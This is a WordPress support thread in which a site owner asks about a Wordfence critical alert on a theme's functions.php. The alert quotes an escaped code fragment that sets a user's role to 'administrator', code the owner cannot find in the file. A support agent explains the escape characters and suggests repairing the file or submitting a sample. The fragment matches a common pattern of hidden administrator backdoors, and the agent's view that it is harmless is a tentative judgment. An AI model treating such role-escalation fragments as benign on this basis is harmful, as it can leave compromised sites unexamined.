Critical issue in theme functions.php – showing not existing code

  • Resolved damians20171

    (@damians20171)


    1 year, 5 months ago

    Hi,

    I have a problem with WordFence scanner – it shows a critical issue in theme functions.php file.

    The part of code is:

    >set_role('administrator');\x0a\x09\x09}\x0a\x09}\x0a}\x0a\x0afunction can_woocommerce_product_custom()\x0a{\x0a\x0a\x09if (is_front_page() || is_page(8046) || is_page(8048)) {\x0a\x0a\x0a\x09\x09global $product;\x0a\x0a\x09\x09echo

    The problem is that there is no such code in that file and nowhere in the theme folder.

    I tried to scan like 4 times and still it is found.

    Could you please tell me what what to do with that fact?

    Thank you in advance

Viewing 1 replies (of 1 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @damians20171, thanks for getting in touch.

    The \x0A character usually signifies the equivalent of a \n or line break, and as it appears to genuinely be at the end of HTML lines without other obfuscated code, may have been generated by a page builder or a minification/compression process (sometimes also seen during backups). The \x09 with it is equavalient of pressing tab to indent the text, which would also be common to see in code.

    This would appear like a regular file when looking, and you’d just see the blank or new lines like:

    ...>set_role('administrator');

function can_woocommerce_product_custom()
{

    if (is_front_page() || is_page(8046) || is_page(8048))...

    Have you already tried to repair the file before running the additional scans? I don’t believe this to be related to a threat from the example I’ve seen, but if you’re unsure you can always download and send the file itself to samples @ wordfence . com for our team to take a look at. Sometimes the sample text in a scan result can be cropped before the reason why the file was flagged is displayed.

    Make sure any passwords, keys or salts are censored prior to sending any files that might contain them.

    Thanks,
    Peter.

Viewing 1 replies (of 1 total)
  • The topic ‘Critical issue in theme functions.php – showing not existing code’ is closed to new replies.